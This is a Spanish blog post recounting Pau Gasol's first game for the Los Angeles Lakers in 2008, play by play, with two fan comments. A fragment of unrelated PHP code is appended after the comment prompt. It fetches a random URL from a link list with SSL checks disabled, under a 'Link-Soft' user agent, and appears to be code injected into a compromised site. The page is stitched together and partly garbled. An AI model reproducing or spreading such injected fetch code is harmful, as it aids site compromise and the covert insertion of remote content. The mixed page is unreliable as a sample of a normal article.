Pau Gasol: el debut

06 de February de 2008 por Viva_Dirk

paulakerdebutEran las 1:40, hora española, cuando Pau Gasol debutaba como jugador de Los Angeles Lakers. Salió de inicio junto a Fisher, Bryant, Radmanovic y Odom. Enfrente se encontraban los Nets, en un IZOD Center con casi 20.000 personas. Lo que ocurrió a continuación, explicado al detalle, fue esto:

Primer cuarto

La primera acción de Pau fue disputar el salto inicial frente a Sean Williams. El balón ganado por Gasol llegó a Odom, que asistió a Radmanovic para la primera canasta del partido, a la que responderían los Nets con 5 puntos en 30 segundos. Transcurridos apenas 2 minutos, Pau capturó su primer rebote de la noche tras un fallo en el tiro de Carter y con 5-5 en el marcador, Lamar Odom se quedó corto en su intento de mate y al caer su codo impactó violentamente sobre el ojo izquierdo de Richard Jefferson, que tuvo que ser sustituido por Antoine Wright. Pocos segundos después llegó el primer intento de canasta por parte del español: lo que era una bandeja los nervios de Gasol lo convirtieron en un lanzamiento al tablero que no tocó aro. Afortunadamente, en el siguientepaugasolvincecarter ataque, tras dos rebotes ofensivos y otro mal tiro, Pau machacó el aro de los Nets y consiguió sus 2 primeros puntos como jugador de Lakers. Después de anotar perdió un balón para, acto seguido, volver a machacar a placer, en este caso tras un gran pase de Odom. Con 7:30 en el reloj del primer cuarto, cometió falta, 5 segundos después de fallar un tiro de media distancia. El partido marchaba con 13-12 a favor de los Nets cuando Gasol fue sancionado con su 2ª falta personal, esta vez en ataque y pitada por el árbitro principal, ya que el que estaba más cerca estaba a punto de pitar falta en defensa de Vince Carter. Así acabó el primer cuarto de Gasol, con 4 puntos, 3 rebotes y algo de nerviosismo.

Segundo cuarto

En el segundo cuarto, con 26-27 para Lakers, Gasol saltó de nuevo a la cancha y fue el primero en lanzar por parte de los de Phil Jackson: falló un tiro en fade away. Durante este periodo su labor fue la de colocar bloqueos y generar ventajas desde el poste, tanto alto como bajo, lo que dio lugar a que asistiera a Luke Walton para el punto número 30 de los angelinos. Anotó su sexto punto en una bandeja cómoda tras pase de Radmanovic y a falta de 5:13 para el descanso cometió su 3ª falta. Gasol acababa la primera parte de su debut con los Lakers con 6 puntos, 3 rebotes, una asistencia, 2 pérdidas y 3 de 7 en tiros.

Finalizó la primera parte con empate a 47 en el marcador, con un mal Bryant, un Pau impreciso y nervioso, tirando del equipo Fisher con 12 puntos, Radmanovic con 9 y Odom con 6 puntos, 8 rebotes y 5 asistencias.

Tercer cuarto

Los Lakers arrancaron el tercer cuarto con un parcial de 5-0, gracias a dos tiros libres de Fisher y a un 2+1 de Gasol tras asistencia de su base titular. Esto, en el primer minuto y medio del cuarto, en el que Pau capturó su 4º rebote. Después llegaron 5 puntos consecutivos de Radmanovic para poner a Los Angeles con 8 puntos de diferencia, la segunda de estas canastas tras una buena combinación con Gasol. Los Nets reaccionaron con un triple de Nachbar y un tiro libre de Carter, mientras que Bryant perdía dos balones y cometía una falta en ataque, todo esto con 7:21 por jugar antes del último cuarto. Inmediatamente después de dos tiros pauboardjeffersonlibres fallados por Carter, Gasol capturó el rebote defensivo y provocó la 3ª falta de Carter tras capturar esta vez un rebote ofensivo. Los dos tiros libres fueron anotados por Pau. A falta de 4:11 anotó su punto número 13 a pase de Radmanovic, y sería su última canasta del cuarto, ya que fue sustituido a falta de 1 minuto para finalizar el periodo, con 13 puntos, 7 rebotes, 2 asistencias y 5 de 10 en tiros, con su equipo arriba en el marcador por 71-75.

Último cuarto

El último cuarto comenzaba con Pau capturando su octavo rebote y Carter anotando su punto 23º, y con unos Lakers que no eran capaces de escaparse en el marcador, aunque no pasaban problemas para conservar su pequeña ventaja. Tras un triple de Vujacic llegaron dos canastas consecutivas de Gasol, una tras asistencia de Walton y la otra en el uno contra uno, que dejaban a su equipo 7 arriba. Tras dos minutos de tiros fallados, balones perdidos y faltas personales por parte de ambos equipos, Jefferson anotó 4 puntos consecutivos para dejar la ventaja de los Lakers en 3 puntos con 81-84 en el marcador a falta de 6:12 para el final del partido. Los Lakers contestaron con un 2+1 de Gasol en jugada individual, Carter anotó en la siguiente posesión y Gasol regaló una canasta a Fisher con un pase sin mirar por encima del hombro, provocando el “ooooh” en la grada y el júbilo en los aficionados de los Lakers. Los nervios de Gasol habían pasado definitivamente. Dos tiros libres de Odom y un perfecto pick&roll entre Kobe y Gasol dejaban la diferencia en 10 puntos, y una bandeja de Fisher a falta de 2:49 ponía la máxima del partido con 12 puntos y el partido encarrilado. En los compases finales Pau anotó su última canasta, de nuevo a pase de Bryant, y daba su cuarta asistencia, esta vez a Lamar Odom.

La actuación final de Pau con 24-12-4 dejó una gran impresión en su debut, pese a ver el peor partido de Bryant en muuuucho tiempo. Al 24 se le vio de muy buen humor, incluso bromeando con algunas palabras en castellano durante la entrevista que le hicieron a Gasol al final del partido.

Conclusión: nos vamos a divertir.

Os dejamos con el resumen de la actuación de Gasol y los Lakers:

Comenta

2 comentarios a esta entrada

  1. telekoman dice:
    #1

    Imaginaros que cuando venga Bynum, Pau seguirá haciendo los Pick&Roll pero ahora con un tío grande de verdad dentro, por lo que las opciones de ataque serán aún mucho mayores. Y esp que el partido de Kobe parece que ha sido excepcionalmente malo.
    Cambio importantísimo en el equilibrio del Oeste.

      Citar

  2. MagicJohnson32 dice:
    #2

    Tengo curiosidad y ganas por ver a los Lakers al completo. La pareja Pau & Drew tiene un potencial salvaje, sobre todo porque los equipos seguirán sobremarcando a Kobe y tendrán que desproteger la pintura. Se pueden poner las botas si Bynum recupera la forma de diciembre-enero.

    Creo que Kobe bajará mucho su anotación, al menos si las cosas van bien, y el equipo se volcará bastante en integrar al máximo a Pau.

    Pinta muy bien.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>